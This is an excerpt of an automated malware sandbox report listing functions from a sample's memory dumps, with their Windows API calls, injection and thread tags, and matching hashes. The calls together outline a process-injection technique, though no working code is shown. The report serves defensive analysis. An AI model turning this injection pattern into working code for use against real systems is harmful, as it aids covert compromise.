                                                              control_flow_graph 1117 5901284-59042fc 1120 5904302-5904307 1117->1120 1121 59043ac-59043cc call 590115c 1117->1121 1122 5904309-5904340 1120->1122 1123 590435a-5904392 CallWindowProcW 1120->1123 1128 59043cf-59043dc 1121->1128 1130 5904342-5904348 1122->1130 1131 5904349-5904358 1122->1131 1126 5904394-590439a 1123->1126 1127 590439b-59043aa 1123->1127 1126->1127 1127->1128 1130->1131 1131->1128
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05904381
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2127651718.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5900000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: c629be613e130204bba311bf7a45ff535d78562c1129d80f28389a8d3e3c58cb
                                                              • Instruction ID: 95c03bbd480314a74bc55a1ca034708c058c95dfd43494bfe86f5f1484567f85
                                                              • Opcode Fuzzy Hash: c629be613e130204bba311bf7a45ff535d78562c1129d80f28389a8d3e3c58cb
                                                              • Instruction Fuzzy Hash: BE4138B5900305DFCB14CF99C888AAAFBF6FF88314F24D859D619A7361D370A840CBA0
                                                              Function 031B44C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 031B59A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: b436c0c56105ede63d75fbe96dfcf16309bf796d6c3fcaceb4b4888a773ecb4b
                                                              • Instruction ID: 65aa24c53a1e3f2cfe00a8d91f65f15a19af9f2ec7a9e4f0471c343cb293e4b0
                                                              • Opcode Fuzzy Hash: b436c0c56105ede63d75fbe96dfcf16309bf796d6c3fcaceb4b4888a773ecb4b
                                                              • Instruction Fuzzy Hash: 8541CFB0C00719CBDB24DFAAC984ADDBBF6FF49304F24806AD508AB251DB756949CF90
                                                              Function 031B58ED Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 031B59A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: fb50f7353e31376003bf3c1acba42cf9a9788542c225634c49f67cdcaf2728dc
                                                              • Instruction ID: e48109ece924089c9ab61021b9913ab44163b01cae932b29514114719ac1aca9
                                                              • Opcode Fuzzy Hash: fb50f7353e31376003bf3c1acba42cf9a9788542c225634c49f67cdcaf2728dc
                                                              • Instruction Fuzzy Hash: 8141BFB0C00719CFDB24DFA9C984ADDBBF2BF49304F24816AD408AB251DB75694ACF90
                                                              Function 05314011 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 053140A8
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: b98042aca45463098d2584e906f95ce9eee76646f84a43c26ecb170de09b2a98
                                                              • Instruction ID: 1abb36b5e8bc803d3ab296da237ea553cd90ae45c9bb08ed78d518e6f9344ba0
                                                              • Opcode Fuzzy Hash: b98042aca45463098d2584e906f95ce9eee76646f84a43c26ecb170de09b2a98
                                                              • Instruction Fuzzy Hash: D12168759003599FCF10CFAAC884BDEBBF5FF88310F108429E919A7240C7759944CBA4
                                                              Function 05314018 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 053140A8
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 7cb456a84290f3a80d07e261b68a2f059e3d55ec0fbed93429cbbc859cc038ba
                                                              • Instruction ID: 4fde961b3b8086b0950b487f8a0304c0e8b093bd4d43e30eaf21f4c40c051729
                                                              • Opcode Fuzzy Hash: 7cb456a84290f3a80d07e261b68a2f059e3d55ec0fbed93429cbbc859cc038ba
                                                              • Instruction Fuzzy Hash: C62146759003099FCB10DFAAC884BDEBBF5FF48320F10842AE919A7240C7799944CBA4
                                                              Function 031BAEF4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031BD4AE,?,?,?,?,?), ref: 031BD56F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 2c9d811dcca58d179ad1eb1f063376068f824df3c4b1f35198b779518cd34a87
                                                              • Instruction ID: b3a93fb84752bdfdfdb690d5c3a8938cfb0ca1b1a1fb7dd11365e12447d2c9bd
                                                              • Opcode Fuzzy Hash: 2c9d811dcca58d179ad1eb1f063376068f824df3c4b1f35198b779518cd34a87
                                                              • Instruction Fuzzy Hash: AC21E3B5900208EFDB10DF9AD984AEEFBF8EB48310F14841AE918A3310D374A954CFA4
                                                              Function 05314100 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05314188
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 78cdf62d022b51ed7f4d7852c28341d04a5318671599a07eececa7c2b24864f6
                                                              • Instruction ID: 54629ac9af0c3f6bb4b9dd084c96c9d1aac94c5a5ed8561cbd648d8a5974ec8f
                                                              • Opcode Fuzzy Hash: 78cdf62d022b51ed7f4d7852c28341d04a5318671599a07eececa7c2b24864f6
                                                              • Instruction Fuzzy Hash: D4212A718003599FCB10DFAAC885ADEFBF5FF48320F108429E919A7240C7789945DBA4
                                                              Function 05313E78 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05313EFE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: a6d65d9c6a610c423607c3b5ac1c606b22931866aff08c3ee3bd7858a39aa956
                                                              • Instruction ID: bf3e924559581ed6e59ee6106f1b14393f27802a620b0776d74ee4c5449af668
                                                              • Opcode Fuzzy Hash: a6d65d9c6a610c423607c3b5ac1c606b22931866aff08c3ee3bd7858a39aa956
                                                              • Instruction Fuzzy Hash: BB2157B69002098FDB14CFA9C8857EEBFF4AF88314F14842AD859A7241CB789945CFA4
                                                              Function 05313E80 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05313EFE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: b39a89422b1ae4b32cc802ab918838e15acc7b7a04dd0162adf774577573c491
                                                              • Instruction ID: 472a7221a633b2ea0558fb842353e4f3b2ee61395d4b1e7797205e2e9b4231b5
                                                              • Opcode Fuzzy Hash: b39a89422b1ae4b32cc802ab918838e15acc7b7a04dd0162adf774577573c491
                                                              • Instruction Fuzzy Hash: 1D2149719003098FDB14DFAAC8857EEFBF4EF88324F14842AD819A7241CB789945CFA4
                                                              Function 05314108 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05314188
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: bafeb882dffc3dd047495288572bb863d300db563e708daef323b0f88080efcd
                                                              • Instruction ID: 5c9257269808f241f7ab3077c8eac5c9b893957c148fcf83156b4ff9c2000cca
                                                              • Opcode Fuzzy Hash: bafeb882dffc3dd047495288572bb863d300db563e708daef323b0f88080efcd
                                                              • Instruction Fuzzy Hash: 39213C71C003599FCB10DFA9C884ADEFBF5FF48310F108429E919A7240C7749544DBA4
                                                              Function 031BD4E1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031BD4AE,?,?,?,?,?), ref: 031BD56F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 967a39ad642a0136242fd2a85fad98c4fbf3515bc452159c2cad3d88065592d3
                                                              • Instruction ID: 182bb3cd30c4019aa85125ab94de644df1fdd551cb33c38242575d794718b736
                                                              • Opcode Fuzzy Hash: 967a39ad642a0136242fd2a85fad98c4fbf3515bc452159c2cad3d88065592d3
                                                              • Instruction Fuzzy Hash: 4221E0B59002499FDB10CFA9D984AEEBBF4EB48310F14841AE918A7350D378A944DFA4
                                                              Function 031BB291 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 031BB25E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 572349a6306ae895a2766ae49476afdd4deb2a84d32ac7c8c0b8d3477ace9143
                                                              • Instruction ID: 39dd5559849bc88586636601b32e502bc0c130b5afc74acf7baa8345ed5083a0
                                                              • Opcode Fuzzy Hash: 572349a6306ae895a2766ae49476afdd4deb2a84d32ac7c8c0b8d3477ace9143
                                                              • Instruction Fuzzy Hash: 9211BF76A043058FDB14DB6AD8007EEB7F9EF8C310F088069D548A7650CB74A801CBE0
                                                              Function 05313F50 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05313FC6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: c66fb6d9c95f7767eac8979893eeb69681b21a9ba89e1ecad7541957ad246113
                                                              • Instruction ID: 7108e2a77f217cdbd6c082c1d54f132250fe47229c90088614be4c228e3c5f5d
                                                              • Opcode Fuzzy Hash: c66fb6d9c95f7767eac8979893eeb69681b21a9ba89e1ecad7541957ad246113
                                                              • Instruction Fuzzy Hash: 8E1159769002499FCB10DFAAC844ADFBFF5EF88320F148819E519A7250CB75A544DFA4
                                                              Function 05313F58 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05313FC6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 0799acda92e72115e6c08cd89878b27c8d61b5df415a7034b2cea881ad5bbcee
                                                              • Instruction ID: c382137dfd7647ee241b66b41edcaf7e215f631c5ddc9e0d8762bdb59d121a93
                                                              • Opcode Fuzzy Hash: 0799acda92e72115e6c08cd89878b27c8d61b5df415a7034b2cea881ad5bbcee
                                                              • Instruction Fuzzy Hash: 03113A769002499FCB10DFA9C844ADEFFF5EF88320F148819E519A7250C7759544DFA4
                                                              Function 077D9C38 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OutputDebugStringW.KERNELBASE(00000000), ref: 077D9CB0
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: DebugOutputString
                                                              • String ID:
                                                              • API String ID: 1166629820-0
                                                              • Opcode ID: 6904291eaf2eb12e5f656f4596843c2d2ddb84cdf82dcf189e8168ba7929c0cb
                                                              • Instruction ID: 4d331f54e2a1ae2a77b42ff8444d7eab4ceacb374b4b064671b47fcdbe457278
                                                              • Opcode Fuzzy Hash: 6904291eaf2eb12e5f656f4596843c2d2ddb84cdf82dcf189e8168ba7929c0cb
                                                              • Instruction Fuzzy Hash: B21123B1C0061A9FCB10CF9AD945B9EFBF8FB58320F14851AD918A3340D774AA44CFA5
                                                              Function 077D8A68 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OutputDebugStringW.KERNELBASE(00000000), ref: 077D9CB0
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: DebugOutputString
                                                              • String ID:
                                                              • API String ID: 1166629820-0
                                                              • Opcode ID: a2fdff6665d517f771f5f807c4a10138deecaff88d0ec8af832fd2556cc175eb
                                                              • Instruction ID: b32484c81e3b7f2c3a72d1fe1e46563037d9302a4b5b9f922b7b2bf2658c7ebf
                                                              • Opcode Fuzzy Hash: a2fdff6665d517f771f5f807c4a10138deecaff88d0ec8af832fd2556cc175eb
                                                              • Instruction Fuzzy Hash: 6E1123B5C0061A9BCB14DFAAD944B9EFBF4FB48320F10852AD918A3340D774A944CFA5
                                                              Function 05313992 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 9b037e2cc446027f92678d72d7ad17ae4ee493c8ba7487484a887348574c95a3
                                                              • Instruction ID: e67597b01da4d074c166e6ac93d565b2188d524de76ffcc31ab95d825df9fb0d
                                                              • Opcode Fuzzy Hash: 9b037e2cc446027f92678d72d7ad17ae4ee493c8ba7487484a887348574c95a3
                                                              • Instruction Fuzzy Hash: 24113AB19002498FDB24DFAAC8457EEFFF8EF88324F148819D519A7240CB75A944CFA4
                                                              Function 05313998 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: d59d865d001b013d8abf724c290b2719e711912226d69d7228cd8a8c1e20121d
                                                              • Instruction ID: fbd44b8bf0ff5df1562e412d18f77c09c66d9d58a1b672a609ec0a304989f932
                                                              • Opcode Fuzzy Hash: d59d865d001b013d8abf724c290b2719e711912226d69d7228cd8a8c1e20121d
                                                              • Instruction Fuzzy Hash: 0C113AB19002498FDB24DFAAC8457EEFFF8EF88324F148819D519A7240CB75A944CFA4
                                                              Function 031BB1F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 031BB25E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 3588cadd2c5ecdf347cdaab6e106d842bd19f598acf0cafa945f920e91d17bfb
                                                              • Instruction ID: ec3b7d358368860a60bd3a496913159bf381be7be28199b09ca1533163d2671b
                                                              • Opcode Fuzzy Hash: 3588cadd2c5ecdf347cdaab6e106d842bd19f598acf0cafa945f920e91d17bfb
                                                              • Instruction Fuzzy Hash: A91110B6C04249CFCB10CF9AC844ADEFBF4EB88320F14845AD469A7610C379A545CFA5
                                                              Function 053150DC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05317D2D
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: e45f71fe396a5fb52460361b594f0ec937deda7dbb46b956bd81e51b2f2321d2
                                                              • Instruction ID: 67ca6fa09d9e2c955416a3dd260cc10b15586d623013ca54eff4985b43d4b862
                                                              • Opcode Fuzzy Hash: e45f71fe396a5fb52460361b594f0ec937deda7dbb46b956bd81e51b2f2321d2
                                                              • Instruction Fuzzy Hash: 9A11E0B58002499FCB10DF9AD984BEEBBF8EB58320F148459E919A7600D375A944CFA5
                                                              Function 05317CCA Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05317D2D
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: a648bbbcb0a9b1e9ce07bd9addd232592e3cc9adfd52e9de1bbac5957ee00cd9
                                                              • Instruction ID: 40ba398ad8e812a190058d067df05cf5c7cdd8c0bffbec0d0ad853ca7a577579
                                                              • Opcode Fuzzy Hash: a648bbbcb0a9b1e9ce07bd9addd232592e3cc9adfd52e9de1bbac5957ee00cd9
                                                              • Instruction Fuzzy Hash: FA11C2B5800249DFDB10DF9AD985BDEFBF8EB58320F148459E919A7200C375A944CFA5
                                                              Function 077D9CE8 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(00000000), ref: 077D9D4F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: a5aa180ad60a318d16b9ba398ff1db90e17d518bfe72da1f083f3730a5936f95
                                                              • Instruction ID: ba5d3d24018fd5ff5cc3de828eccfccb4e09053a3754d9c6507d5b278b168a02
                                                              • Opcode Fuzzy Hash: a5aa180ad60a318d16b9ba398ff1db90e17d518bfe72da1f083f3730a5936f95
                                                              • Instruction Fuzzy Hash: 1D1166B1800209CFCB20CF9AC849BDEFBF8EB58320F148429D518A3350D378A944CFA5
                                                              Function 077D8A74 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(00000000), ref: 077D9D4F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: ca41ea00c75f07f9e01b295f8e4354ab84dba63efe3d6fd59402c24a8a4303a3
                                                              • Instruction ID: 22136b3ff95ac2c7210718b2bca2ce200aef8652068d2e266f1137c6461dd520
                                                              • Opcode Fuzzy Hash: ca41ea00c75f07f9e01b295f8e4354ab84dba63efe3d6fd59402c24a8a4303a3
                                                              • Instruction Fuzzy Hash: 791128B1800359CFDB20DF9AC948BDEFBF8EB49320F108469D518A3251D778A944CFA5
                                                              Function 0311D1FC Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119088104.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_311d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1e5741cae9c08bb28ec10a9e67c625a18c63b7ea294af8a24f3c95d848b87a6
                                                              • Instruction ID: 734c14df9d3c11e94865515c9185e16d19cc8e4cdf8b3a9c7009fce3112dd0e8
                                                              • Opcode Fuzzy Hash: e1e5741cae9c08bb28ec10a9e67c625a18c63b7ea294af8a24f3c95d848b87a6
                                                              • Instruction Fuzzy Hash: 4721C172504240DFDB15DF54E9C4B6AFBA5FB8C320F24C6A9E9190B246C33AD466CBA1
                                                              Function 0311D4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119088104.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_311d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 06826e96745cafe791e62349f38136f6f98c10ca9247353528463accdd125a98
                                                              • Instruction ID: 0d4b1239369a4fd0103dfa09c876bfcff5d38a3fbcc40916963db957a311a808
                                                              • Opcode Fuzzy Hash: 06826e96745cafe791e62349f38136f6f98c10ca9247353528463accdd125a98
                                                              • Instruction Fuzzy Hash: 9F210371504240DFCB15DF14E9C0B76BF75FB88328F24C5B9E8090B25AC336D466CAA2
                                                              Function 0312D1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119188126.000000000312D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0312D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_312d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25d17a1b65cd35aea2bb863ec5118f1e9ad66b2be71c5ef0e3b4b61e772836b2
                                                              • Instruction ID: 23551b316d12fdfbc4973f8394ae33e4a15028ba590cc9a2b2264d0224a1f4c6
                                                              • Opcode Fuzzy Hash: 25d17a1b65cd35aea2bb863ec5118f1e9ad66b2be71c5ef0e3b4b61e772836b2
                                                              • Instruction Fuzzy Hash: EE212671504200EFDB05DF14E9C0B26BFA5FB8C314F24C9ADE8194B256C33AD866CA61
                                                              Function 0312D01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119188126.000000000312D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0312D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_312d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58e13bc19e134f1806316c67586fbf0107b29302b80c49eafa1a3698aad1b1b9
                                                              • Instruction ID: f927200169938c986077c2b2721aa204dd75ecb2f6f0be39e8d3dd49f11dec30
                                                              • Opcode Fuzzy Hash: 58e13bc19e134f1806316c67586fbf0107b29302b80c49eafa1a3698aad1b1b9
                                                              • Instruction Fuzzy Hash: 8F212271604240DFCB15DF14E980B26BF65EB88324F24C9ADD81A0B2A6C33AD867CA65
                                                              Function 0312D006 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119188126.000000000312D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0312D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_312d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1a5773061208671c83e23e21907c52065095f162a477e842293049e7ca78e66
                                                              • Instruction ID: e98909e6b28130fcd9107a198ca584a44f5173b626c01775d92152a5054bda57
                                                              • Opcode Fuzzy Hash: d1a5773061208671c83e23e21907c52065095f162a477e842293049e7ca78e66
                                                              • Instruction Fuzzy Hash: 642184755083809FCB12CF24D994715BF75EF4A314F28C5DAD8498F2A7C33A985ACB62
